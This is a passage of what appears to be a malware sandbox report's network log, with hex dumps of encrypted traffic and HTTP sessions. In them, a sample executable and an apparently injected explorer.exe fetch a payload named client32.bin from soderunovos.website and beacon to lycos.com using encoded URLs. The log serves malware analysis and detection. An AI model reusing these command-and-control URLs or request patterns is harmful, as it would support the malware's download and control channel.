2021-11-23 19:59:23 UTC	196	IN	Data Raw: 01 38 5f b6 31 de 97 47 a4 b0 4c 5e 62 71 78 86 67 14 e6 ab ad 90 62 51 19 41 01 7c 93 5b 75 58 8b a0 7a 50 4d 20 7e a3 d2 72 de cb 55 89 9d c9 6f 38 b5 b2 3f 13 59 32 48 38 95 b1 e7 84 92 60 98 0c 46 e5 c7 5d 34 43 9f 5f 38 a6 47 1b a4 28 b9 6e 9f c5 7f 52 46 3d 44 c5 32 7e af f6 a1 b6 81 15 57 3e 9b ae 15 f4 ac ff 19 a0 69 4f b8 e4 2e 5d 59 bf f4 67 b6 76 fb 21 dd 86 7a 0e 9e 3a 92 ec 23 ba b2 cd 30 d9 2b 97 91 ef ff b7 14 93 5c 85 bd bd b9 4a a8 83 7b eb de d8 dd 7a 66 4f 3d df 15 91 ac 4b fe 5c c7 07 97 20 56 7d 92 f8 62 54 0f c9 e9 fd ab 24 ed 89 67 23 b8 10 ad e4 eb 83 91 98 d7 8f 3a 9a ae 67 db 13 07 74 67 7d d6 2b 85 28 62 54 55 e0 ca 50 81 1b 94 e0 02 5d 3c 87 45 9a c8 9a 85 ce bb 58 99 c2 84 99 30 98 e5 ed 44 44 12 09 be c6 6b 4c 51 13 de 86 c5 Data Ascii: 8_1GL^bqxgbQA\|[uXzPM ~rUo8?Y2H8`F]4C_8G(nRF=D2~W>iO.]Ygv!z:#0+\J{zfO=K\ V}bT$g#:gtg}+(bTUP]<EX0DDkLQ
2021-11-23 19:59:23 UTC	212	IN	Data Raw: ad 95 af 16 70 68 a2 99 72 70 f9 85 97 9b b6 9a 7a 7e f5 55 ee a8 81 b1 49 ca 42 95 89 e9 3a 17 1c ab 37 67 95 91 6c 02 39 68 43 8e e5 5d 59 84 55 c1 19 6a 54 21 53 4f 72 f7 45 17 f1 6b c6 8e 53 8a de 93 7b 9c 4b fd 8e 67 34 ac 75 33 05 d9 7c da 5f 15 63 c2 79 2f 62 09 1d b6 47 30 c1 53 2f 73 1a a0 01 fd de 94 7e 59 2b 91 6b 39 44 04 07 f0 10 ed 45 77 2c 05 9e 46 ed 26 4c 74 5d 8b 91 3c cd 16 5a 94 06 ad f9 5f 69 93 4b 95 b4 91 39 ed 5c db e2 33 14 77 5e 72 83 3e 30 e9 67 aa 95 a2 99 95 58 22 0e d3 6f 1c 08 d2 91 90 c7 2d 28 eb 30 dd 39 79 31 33 cf b7 b1 34 0c dd 11 d1 e0 4a 12 a3 4d 03 d0 08 84 18 2e 1e 4a 27 fe 19 f8 47 83 12 09 b0 71 ae 2c 77 45 76 12 4b 08 fc 9e 71 c7 67 17 fc b7 de 65 c2 d6 3d bf 03 1a da 36 97 67 66 40 0a 24 b8 ae e6 cc c8 35 ef 2d Data Ascii: phrpz~UIB:7gl9hC]YUjT!SOrEkS{Kg4u3\|_cy/bG0S/s~Y+k9DEw,F&Lt]<Z_iK9\3w^r>0gX"o-(09y134JM.J'Gq,wEvKqge=6gf@$5-
2021-11-23 19:59:23 UTC	228	IN	Data Raw: 07 1b 95 21 da f3 d3 77 d5 ae 62 cb 93 a2 ba c6 c1 c2 9c 24 da 0a 37 3d 16 2c 44 e0 f1 82 d3 e5 7d cb 98 74 ea 6f 14 68 ea 2e a5 95 2f 2a 54 17 f3 17 e6 a4 56 2d 7c 8e f9 70 2b 03 c6 bd d3 be bf 4b 68 d0 28 fe c8 67 12 13 2a 7d 33 0d c4 c7 aa de e1 d0 1a fb d4 a1 39 86 20 fb 78 2a fb 32 ca 1c 3f 0e 66 59 23 2d ef a7 35 de d0 91 dc b1 8d 9c 9f d2 63 0d ba 71 cc dc c7 35 5c 94 d0 80 ab e4 95 e2 4c d7 27 2f 28 04 34 d9 3c a8 22 99 3c 86 83 80 96 92 9a 20 a8 23 1e ce 2c 19 43 8a 61 30 26 b4 01 74 53 7c 33 40 36 a0 52 24 62 fb 46 ff 88 92 df c3 83 c9 55 ac c6 8e 7c 88 2c 72 92 2f 82 a3 90 9c 75 29 06 94 33 88 d5 4f 4b e4 44 ce b8 d5 f9 e7 b9 f9 7a 35 5b d8 88 cd d8 d4 c9 f5 1a a3 a5 89 da f0 e4 29 8b 0f 85 f1 91 94 d2 6a b4 cf 5d 42 aa 62 2b fc 5d 43 cb 5d f0 Data Ascii: !wb$7=,D}toh./TV-\|p+Kh(g}39 x*2?fY#-5cq5\L'/(4<"< #,Ca0&tS\|3@6R$bFU\|,r/u)3OKDz5[)j]Bb+]C]
2021-11-23 19:59:23 UTC	244	IN	Data Raw: 41 b7 e9 4a 03 24 38 c0 6f 17 65 d1 07 a5 a1 7a e6 32 b0 76 ca 66 62 d0 27 32 c1 c3 13 4e 54 1f bd b3 ae 6c dc 15 cc 02 93 0a 00 e1 33 f8 c6 1e 1b 21 f1 4f b0 f1 62 44 da 74 40 95 04 33 7a 0c d1 f3 26 99 38 64 81 6c c3 bb 70 cd 34 7c 9e cd 33 8f c1 ab 47 85 99 16 87 df 41 28 6a d6 d0 14 a1 c4 7e 5f 71 1e 7c e8 14 85 05 25 b0 12 7a e4 97 66 dc a7 67 b2 79 fb b9 45 d8 0f c2 63 01 0c 35 ed 28 5f 0d c4 7f 52 a1 e7 2a d4 9d db 7f 72 37 aa 38 e1 e2 06 0c a4 41 85 fb 1d 10 3e ab 11 5a c8 33 fd f7 2e 44 67 98 e2 cb 23 82 79 17 a5 60 a9 c4 56 d7 c3 3a a0 e1 0a 2a 4e 4b e3 3d 75 b3 c6 3c 48 1c bd 53 ce ec 95 62 96 fc 34 c4 4d ca 15 47 67 19 9c d2 7b 64 93 fa 99 c6 24 be 80 ac 8b 95 d5 5e 87 d3 8e 1e fe 2e f7 4e 1f 72 b5 17 2c 6d 72 33 d1 6e 1a ec 31 16 ab 78 95 24 Data Ascii: AJ$8oez2vfb'2NTl3!ObDt@3z&8dlp4\|3GA(j~_q\|%zfgyEc5(_Rr78A>Z3.Dg#y`V:NK=u<HSb4MGg{d$^.Nr,mr3n1x$
2021-11-23 19:59:23 UTC	260	IN	Data Raw: a8 0c dc 00 8a 38 ca 2d 7d b3 9e 44 6c 42 b7 d1 7a 69 4a 49 cd a1 3d 97 ab 5f 13 aa 5c fe 5d 46 da 6c b3 21 83 48 e0 9d 35 e9 3b c0 29 3b 41 99 e6 16 8c a1 99 a4 9e 66 97 5b 9c c1 83 15 00 3e d9 65 0a 07 ae c4 00 84 08 66 6e f4 27 ad 9b 4d d6 64 a6 22 79 a3 88 94 be 6b 6c a5 cc d1 65 ec 97 c7 54 0b d3 15 06 cd b1 3f 32 d6 33 83 fb c2 88 66 f4 eb a6 1b 02 1b 62 ef 58 f2 82 6c a6 41 fc 4d 19 f7 bd 31 4a 49 03 d5 70 19 89 00 25 54 26 66 ee e9 81 f2 26 e0 30 34 f7 94 bf 79 3c 5f 30 f0 af 1a 4d 83 2f 15 a5 b4 f3 0e 2e 81 77 37 79 c2 15 b0 eb c9 d1 55 20 04 99 02 5c f2 6d 88 83 b7 58 98 c0 6b df af 0e d6 1e 50 e0 c7 8b 91 da f2 b0 3f 98 72 1b f0 44 7f 46 18 95 61 a3 eb 20 df 5f f6 47 19 6b 83 1f e9 8e 39 0e a5 ed 0d 01 5c 27 21 bb 76 e8 b5 3e 18 12 76 13 c8 82 Data Ascii: 8-}DlBziJI=_\]Fl!H5;);Af[>efn'Md"ykleT?23fbXlAM1JIp%T&f&04y<_0M/.w7yU \mXkP?rDFa _Gk9\'!v>v
2021-11-23 19:59:23 UTC	276	IN	Data Raw: 66 b0 ca 68 ae 46 a7 86 16 50 94 22 11 fb 6d f0 74 e2 9d 75 78 b4 9c db ff a4 b1 f0 f3 a4 7e d7 bd d5 14 5b cf ce 7e fc ce 65 7a 99 68 3a bd 81 79 67 09 82 db 91 1c a5 14 99 a8 e8 9f 82 b2 18 31 fe 54 43 7f a2 c4 d1 77 e3 71 c7 57 40 28 ad 80 12 4a 0f f8 29 38 51 68 88 89 bd c1 25 ff 87 8a 86 a3 76 b2 91 1f fc 50 45 7f 89 9b 7b 0e 73 20 77 7e c8 63 06 4b c3 f0 f1 c2 43 c4 4a df 32 e2 b8 23 ac 72 82 f1 6a 6a 5e 7a bb a5 8d e4 ce 2a b2 41 89 0a 90 92 a9 a1 3b 1c 10 a1 e4 7b 73 dc 24 6f 59 36 48 b0 55 ed e6 de 99 7b 54 b8 c0 b4 83 c3 e5 80 e2 91 17 0d 0a 34 bf b2 c3 02 4b b1 d1 12 d2 b1 b7 75 86 56 f8 b2 d8 19 85 03 76 30 4e 4c 91 e4 54 73 3a f2 1b 97 84 7c 6d 0a 0e 68 8b f7 cc 54 c2 ce 97 d1 30 a4 31 a4 ef 1a 06 d7 09 c4 bc c8 0d 21 93 17 dc fd e3 20 42 05 Data Ascii: fhFP"mtux~[~ezh:yg1TCwqW@(J)8Qh%vPE{s w~cKCJ2#rjj^z*A;{s$oY6HU{T4KuVv0NLTs:\|mhT01! B
2021-11-23 19:59:23 UTC	292	IN	Data Raw: 28 f3 a6 d9 af 00 74 dd 0d ce 6d a3 4f 08 24 0e f7 5a bf 2f 50 ca ba da 39 62 64 76 65 70 c0 a4 04 ba 86 74 c8 93 c7 c5 15 c4 23 6f ef ba e2 fb 45 df b8 c1 1a 3d 8e 52 5f 76 22 0a a1 7a 6c cd d8 ff 78 33 3a dc dc d4 fb b5 c6 a5 a3 1c 4c 23 bd 60 b0 c0 32 83 ad 9b 32 9d fe 1e 4b 66 16 42 f6 07 93 74 34 79 c3 c8 38 1e 51 9e eb 8e 5c 07 c4 20 ce b3 78 f2 0f 9d 4e ba 47 88 24 24 56 9e dd 19 3f 5d 20 37 eb b2 5f b8 f7 41 28 d0 28 6e d2 6c a1 ca 61 65 ed 03 dc 39 4a 4b 54 58 96 f5 5b 75 91 6c 67 ef 5e b5 29 ed ef 55 0b 7f 05 d4 ae 45 9f d2 0e 7c f6 d3 12 a3 b8 aa 25 b4 98 ba 2d 80 01 a9 d2 f6 4e 59 92 f5 a6 91 08 f8 2e eb fe 27 5b b3 47 55 af ba 71 e1 83 ca 2c bb aa 91 72 07 85 72 44 10 16 f1 d8 73 5a fe 66 22 fa 46 49 73 30 77 14 54 80 cf af 2a 5e 17 63 1f 25 Data Ascii: (tmO$Z/P9bdvept#oE=R_v"zlx3:L#`22KfBt4y8Q\ xNG$$V?] 7_A((nlae9JKTX[ulg^)UE\|%-NY.'[GUq,rrDsZf"FIs0wT*^c%
2021-11-23 19:59:23 UTC	308	IN	Data Raw: 58 ba 00 0a 5b f6 36 71 13 6d e8 44 f8 52 0b d3 ba b4 db 3b 95 c1 3a 40 a3 49 42 02 18 3a a2 b7 a7 37 ca f8 58 be 4a 05 b4 d6 58 97 9e 04 21 ea 18 09 54 c9 d4 b4 a7 3c 8f a3 fc 38 7c c7 84 b8 f1 f5 2d 62 f8 67 44 fc f4 e0 48 1d 92 59 2c 25 8e 89 79 3d 49 0f 9e 65 d9 94 b2 be c4 2f 97 84 c7 b2 f5 b3 59 82 51 4e 39 8c 3f 29 be 5b b8 6c 5a 37 eb b7 d7 eb be 2d a0 5d 74 45 36 7d d4 08 78 a0 9a 04 84 f5 84 95 36 b4 15 81 4c 2f 80 f3 39 8e c0 da d0 35 67 6b c0 75 ec b8 9d 3f e7 9e ba 64 df 54 cb f6 01 a3 f1 8b 65 1d d7 d3 37 5d 00 f6 51 36 9a a3 21 3c 8b 07 a0 d6 1a 64 21 9d 28 90 af da c5 73 8d 80 7f 78 f2 89 f0 fb 63 02 79 04 67 44 f6 60 97 2e 1d 71 1c f8 32 75 08 e6 c0 91 a4 97 d7 5b f4 d4 1e 57 5f 7d 05 ee cc d4 9c db 06 e9 e7 eb 71 da 96 37 80 95 49 6c 6a Data Ascii: X[6qmDR;:@IB:7XJX!T<8\|-bgDHY,%y=Ie/YQN9?)[lZ7-]tE6}x6L/95gku?dTe7]Q6!<d!(sxcygD`.q2u[W_}q7Ilj
2021-11-23 19:59:23 UTC	324	IN	Data Raw: d5 f6 69 9f 59 ac c3 d7 b2 42 ed 3b bf 58 12 14 e9 65 de 16 22 2f 00 8e 59 c5 44 49 d5 25 be 01 2e ed 1a 25 70 42 8c 3c eb 37 e0 f7 93 fd d2 c2 f2 b6 c2 22 3c f7 74 c3 a6 a0 ce 6d c1 87 7a f0 5b 7a dd 46 4e ae f3 c9 a0 ff 71 0f 69 8e d1 0e ec a5 c9 3b c1 a5 04 d2 9c a0 95 c4 73 55 fe e3 6a c9 70 b6 f8 4c 9b 15 b5 91 b8 b0 93 3a d9 83 5f d3 73 80 5f 8a 53 ec f1 bf 9e 64 f1 ea 79 14 1f 4a 27 0a dd 01 06 fa 8d c5 9c 60 38 0f 45 3b c7 12 e8 cc da e0 f7 1f 02 73 e8 1e da de 28 87 fb 0b 51 62 2e bc 84 13 4d 68 d1 12 d2 a9 b1 d9 35 19 2a aa 76 ce dd 56 b2 ae 3a 29 dd fa d9 c3 2d df cb 6d fe ff f0 36 a6 b1 fe 22 ee c7 e1 1c b2 95 19 d1 45 67 fe 64 a3 2a 86 41 e5 aa e8 25 f1 dd 00 0c 55 ca ab 22 29 93 9c c4 b1 cc 9f 8a 1c e9 22 e6 ff 56 ce 0f 4b b4 58 36 6f 4e 92 Data Ascii: iYB;Xe"/YDI%.%pB<7"<tmz[zFNqi;sUjpL:_s_SdyJ'`8E;s(Qb.Mh5vV:)-m6"EgdA%U")"VKX6oN
2021-11-23 19:59:23 UTC	340	IN	Data Raw: ba d3 69 92 55 51 28 e0 66 fd ef 56 0b 7a 9c 06 ce e6 62 74 a5 77 05 d6 9e da 07 9f 99 36 ee 7b 58 31 85 89 e2 78 98 53 5b 19 2e ac 3b 83 cb 74 43 71 0f 62 72 06 87 1b a5 19 48 5b ab 8e 84 68 ce 4f b6 6d 24 6d fe 31 43 57 82 ce e8 ef b7 16 31 f4 eb d2 03 89 38 1e f4 43 0b 12 7d 0a d5 32 0b da 21 4c 7d f2 7d 1d c8 97 9d 76 e6 42 a4 46 79 76 29 25 b2 79 41 65 07 f8 13 26 31 16 db 0f d1 53 7b 94 46 78 8d ba 70 37 e0 79 e6 3a 98 ad 53 94 6e 52 df c8 dc 1c 46 24 d1 3f 93 5b ba b7 9d 99 97 9b 18 29 b7 89 d4 05 49 be 33 6d 14 79 25 94 0d c9 d1 bd 40 54 4b 37 01 94 07 42 d2 ba 4c f6 fb 03 21 f7 da 37 84 3e 01 c7 16 66 00 7a e2 4f ef 0a 9f 49 96 ab 26 0d e2 f4 68 cf 2d c0 f9 28 4f 27 db ba a1 a8 0f ba 4c 83 f0 63 10 cd 62 03 cb a4 ea 1b a8 47 74 ad b5 06 b0 78 2b Data Ascii: iUQ(fVzbtw6{X1xS[.;tCqbrH[hOm$m1CW18C}2!L}}vBFyv)%yAe&1S{Fxp7y:SnRF$?[)I3my%@TK7BL!7>fzOI&h-(O'LcbGtx+
2021-11-23 19:59:23 UTC	356	IN	Data Raw: a2 51 bf e9 dd c4 dc 11 50 f5 2c 06 99 37 cb f5 b1 cd 77 b1 95 99 f1 16 31 e6 95 fd a7 e5 ab b2 59 a6 3f ac 39 47 7e f6 f6 73 b5 31 53 11 73 60 7f 6e 5c e1 c0 f7 89 28 5f e9 99 78 cf 92 4b 0e 92 f4 9c 0a 94 26 71 17 73 4b 1f 0c 61 99 3e 15 24 42 63 2f 6f fd 0e f2 31 9a 31 65 25 0e 95 b4 fa 27 2e 61 87 0a dc 42 1c b9 28 86 45 0b b7 ed 82 93 89 0b 09 43 27 bf ff 81 b0 d7 2d d6 98 21 45 2c 68 46 70 f8 a1 e3 8b 55 7e 4b 47 a8 5f b8 34 a1 aa 8f 73 d3 36 26 57 0e c5 d3 96 b8 4e 69 4b ab e0 75 68 f2 d4 04 b8 bf c3 6d da af 01 68 b0 01 cd 86 0c 21 8c 66 3b 45 e4 3f 10 dd 4e 1f 92 80 88 fd 3e 99 99 7f cd 93 28 13 74 06 2d 88 ab 9f de 37 c4 c2 6c 45 f6 8b 79 df 6c b7 af d0 04 70 05 24 b9 31 4d 49 15 d2 85 da 8f 83 e3 51 5d 83 33 60 90 96 90 04 e4 26 74 80 c9 fb 21 Data Ascii: QP,7w1Y?9G~s1Ss`n\(_xK&qsKa>$Bc/o11e%'.aB(EC'-!E,hFpU~KG_4s6&WNiKuhmh!f;E?N>(t-7lEylp$1MIQ]3`&t!
2021-11-23 19:59:23 UTC	372	IN	Data Raw: b3 7a 45 d6 5a bd b9 d2 8f 7a ad cc c2 8d 9e 3c 9b 5b fc 87 4c 6a fc 57 86 09 5b a4 03 f4 8b ad 85 81 91 87 e1 0e 33 1e ec b5 b7 7f 88 96 69 90 75 27 ef 1b a7 29 6e a4 95 00 5c a2 95 8b 2c 80 0a 6b 81 db 1b 99 4e b3 95 1e e9 33 f7 3e e6 de a7 50 d2 f2 e8 f7 a2 17 78 67 21 20 5e b9 5c 4d db 89 2b 00 b6 d8 76 3b e1 ae 01 4d 59 12 5d cd 56 ac d9 07 b3 5a 38 6a eb e9 10 f2 0b 1e 97 24 41 7b af ee ad 8f d0 97 01 e3 cf e0 eb 60 9c a0 ed 4b 54 67 82 0f 12 ba a8 2c 33 c2 9f 68 d3 1a 64 74 9b a6 57 41 b6 af 9e bb 48 4d 74 6d 99 e7 cb 70 ca 9f ab 3a 13 a9 c0 e8 80 64 7c ed 38 14 82 83 9f 71 0c bc fd a4 0c da 79 85 5a 99 02 1b 8e 19 08 fe d2 df 43 1e 8e 52 67 dd 6a dc 22 e8 e3 be 97 a0 7a 6a 51 0e c3 e4 62 68 f2 c1 32 88 6e 9e c7 16 26 fb 16 e3 14 60 48 4a e5 f6 20 Data Ascii: zEZz<[LjW[3iu')n\,kN3>Pxg! ^\M+v;MY]VZ8j$A{`KTg,3hdtWAHMtmp:d\|8qyZCRgj"zjQbh2n&`HJ
2021-11-23 19:59:23 UTC	388	IN	Data Raw: 93 03 3b 24 ab 6b 75 d1 e2 80 4f f2 6b 0d 36 0d c1 90 ac 50 e9 f9 05 62 65 ee 00 e3 48 d2 3e 85 4a 10 91 92 8f ae 4f 0d 9e c6 b3 c8 b4 c8 61 17 4c c9 9d 3b 74 2a a5 1b 71 ac b7 3e 98 70 8b e0 ae 87 66 d1 a8 af 43 31 d1 90 d4 cd 59 05 e1 2b 33 bc 30 e9 0c 2d ad bd 0b b5 12 e2 be c0 f4 c5 81 74 c2 55 52 44 26 08 31 c2 ab ec d5 52 bc fb a6 89 b4 4e 1b 8c e5 bb c0 2a 4e 2a 2e 27 bc 06 7b f5 4b ee f9 56 81 f2 31 e6 d7 3d a7 05 e5 65 50 8a f7 23 17 91 e0 b4 9a 1d 28 f2 41 3e ba 5c 47 0d d4 da 4c 5b 41 50 3d 19 c2 fb 02 16 eb dc cb 92 c3 9a 7b 01 4a 37 21 50 fb 36 42 a3 18 71 6b a4 73 c6 1c ff 06 be 0b 9d 7e b7 38 aa 83 f2 80 b2 d2 53 0d 40 8a d9 94 11 39 4b d5 a8 de 68 09 5f a2 af 19 89 70 17 30 ef 50 bc da 8b 7c f6 38 52 ef d7 bf cd 00 fd 6a e3 78 5b 94 bb c0 Data Ascii: ;$kuOk6PbeH>JOaL;tq>pfC1Y+30-tURD&1RNN*.'{KV1=eP#(A>\GL[AP={J7!P6Bqks~8S@9Kh_p0P\|8Rjx[

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49755	89.44.9.140	443	C:\Users\user\Desktop\FpYf5EGDO9.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 19:59:23 UTC	402	OUT	GET /jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/rat2KiIdmFuMYJV01lFIUuv/pv1M_2F42q/2ghlrrK6HyvaK1iGn/6FWd3U6RwdJs/DwljQfV1T1s/A2jFEhH_2FVbra/gemmgKqmTU3dGSSrHsVgF/6KFwQzXOgNC787ml/o9EUNqnCP/_2FVV.crw HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: soderunovos.website Connection: Keep-Alive Cache-Control: no-cache Cookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
2021-11-23 19:59:23 UTC	403	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Tue, 23 Nov 2021 12:20:02 GMT Content-Type: application/zip Content-Length: 1847 Connection: close X-Powered-By: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: public Pragma: no-cache Content-Transfer-Encoding: Binary Content-Disposition: attachment; filename=client32.bin
2021-11-23 19:59:23 UTC	403	IN	Data Raw: a5 bb f0 c6 4e 81 58 fc 3f 81 38 78 06 71 35 94 b5 63 5d f7 3a 90 95 f0 f1 a5 d6 79 e3 d8 4b bd 1a d4 8e 32 9e 2a cb a4 68 98 24 81 6e fe 0f 96 95 8b a8 fe 63 f7 21 de 73 fa 10 4c 93 dd 35 6f 20 a8 a7 2c 46 88 07 86 ca fc b5 19 c6 db f2 00 40 05 7e 0d c2 50 6b 95 b9 fa 24 d2 fb 3b 91 94 11 75 f9 c5 57 51 bf 16 37 8e 92 dc f5 2d 02 85 84 e7 46 ef 6b e7 03 10 2c 60 0b 1b 6a 0f a2 1c 6a d0 df 77 8a 0e ad 0c bd ca 8c 13 d8 4f ef 04 7f aa ca 3c 1c 94 2f d7 84 ed 2c 1e 83 25 24 a9 58 ca 0d 6e fb 63 0b 57 74 2b fc e8 a8 89 b0 34 e4 b3 74 df 0f 54 ee a7 18 f8 d4 4a 37 ff d4 66 6b 78 50 08 88 a4 3b 81 56 7e 13 f2 0e 01 39 69 3b 7e 67 02 64 cb 16 09 13 7b 0e f2 5d 67 bf 8f 80 0d fb e3 b8 8c fb 04 ea 71 9a 50 1f 84 16 26 09 ff 3b 17 10 62 8f 1b 3d 6e 47 69 0d a4 1a Data Ascii: NX?8xq5c]:yK2*h$nc!sL5o ,F@~Pk$;uWQ7-Fk,`jjwO</,%$XncWt+4tTJ7fkxP;V~9i;~gd{]gqP&;b=nGi

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49817	209.202.254.90	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 20:01:38 UTC	405	OUT	GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: lycos.com Connection: Keep-Alive Cache-Control: no-cache
2021-11-23 20:01:38 UTC	405	IN	HTTP/1.1 302 Found Date: Tue, 23 Nov 2021 20:01:38 GMT Server: Apache Content-Security-Policy: frame-ancestors 'self' *.lycos.com Location: https://www.lycos.com/images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg Content-Length: 512 Connection: close Content-Type: text/html; charset=iso-8859-1
2021-11-23 20:01:38 UTC	406	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 79 63 6f 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 44 39 4f 70 56 74 52 36 63 68 37 79 61 58 51 4d 2f 45 61 44 35 78 57 38 41 42 64 54 59 79 42 50 2f 47 74 34 63 4a 5f 32 46 6a 46 58 79 63 4f 34 54 47 75 2f 4d 43 44 39 6f 39 33 71 46 2f 67 63 58 43 78 73 4a 6c 69 54 74 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.lycos.com/images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49818	209.202.254.90	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 20:01:38 UTC	407	OUT	GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Connection: Keep-Alive Cache-Control: no-cache Host: www.lycos.com
2021-11-23 20:01:38 UTC	407	IN	HTTP/1.1 302 Found Date: Tue, 23 Nov 2021 20:01:38 GMT Server: Apache Content-Security-Policy: frame-ancestors 'self' *.lycos.com X-Powered-By: PHP/7.2.24 Location: https://www.lycos.com/images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg/ Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49819	209.202.254.90	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 20:01:39 UTC	408	OUT	GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg/ HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Connection: Keep-Alive Cache-Control: no-cache Host: www.lycos.com
2021-11-23 20:01:39 UTC	408	IN	HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2021 20:01:39 GMT Server: Apache Content-Security-Policy: frame-ancestors 'self' *.lycos.com X-Powered-By: PHP/7.2.24 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2021-11-23 20:01:39 UTC	408	IN	Data Raw: 33 32 33 65 0d 0a Data Ascii: 323e
2021-11-23 20:01:39 UTC	408	IN	Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 4a 53 20 66 6f 72 20 54 79 70 65 6b 69 74 20 66 6f 6e 74 20 45 6d 62 65 64 64 69 6e 67 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 69 75 65 36 7a 62 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 74 72 79 7b 54 79 70 65 6b 69 74 2e 6c 6f 61 64 28 29 3b 7d 63 